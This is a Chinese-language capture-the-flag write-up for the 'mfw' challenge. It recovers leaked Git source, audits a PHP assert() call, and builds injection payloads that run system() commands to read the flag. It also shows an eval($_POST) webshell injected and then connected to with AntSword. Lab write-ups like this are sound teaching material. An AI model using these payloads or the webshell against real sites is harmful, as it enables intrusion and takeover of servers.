mfw
进去之后,在About界面得到提示,写这个网站用了Git,PHP,Bootstrap(一个网站框架)
想到Git泄露,用dirsearch扫一下,发现果然有git泄露
然后再用GitHack扫一下,githack的本质是解析/.git下的index文件,然后去objects找到相应文件并下载,然后我们得到源码。
查看下目录,发现个flag.php,但是没有什么东西,因为这个git是故意泄露的,经过了某步处理(我也不清楚除了了啥)。。所以没有flag.
这里我们通过git泄露下载的源码,除了flag.php不是网页的源码外,其余的源码和结构都与题目网页相同。
审计代码发现只有index.php内的信息有用。
代码审计
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "templates/" . $page . ".php";
// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
?>
assert()函数,会将里面的字符串当作php代码执行,返回的结果是True或者False
Bool or Bool 语句,若前面为False,则执行后面的语句,为Ture则不执行后面的语句
strpos()函数,返回字符串在另一字符串中第一次出现的位置,如果没有找到字符串则返回 FALSE。
这里审计代码发现有个assert()函数,并且没有对$page变量进行过滤,进而我们可以控制$file参数,然后利用闭合,来执行我们的payload
构造
?page=abc','..') or system('ls');//
我们的$file参数就是
templates/abc,'..') or system('ls');//.php
在assert函数里就是
assert("strpos('templates/abc,'..') or system('ls');//.php, '..') === false") or die("Detected hacking attempt!");
这里//起到注释作用,因为'templates/abc'里没有..自然返回False,然后执行or后面的语句,来达到任意命令执行。
构造
?page=abc','..') or system('cat templates/flag.php');//
拿到flag
当然我们也可以利用file_get_contents函数,再右键查看源码
abc','..') or var_dump(file_get_contents("templates/flag.php"));//
但是这时显示的却是
经测试
原因是返回的NULL,NULL==false,所以会执行die
或者是构造?page=abc','..') or eval($_POST['hacker']);//
然后蚁剑连接,拿到shell
这题跟ctfhub的git泄露都可以还原源代码,但是ctfhub侧重于git的基本操作,而这题侧重于代码审计。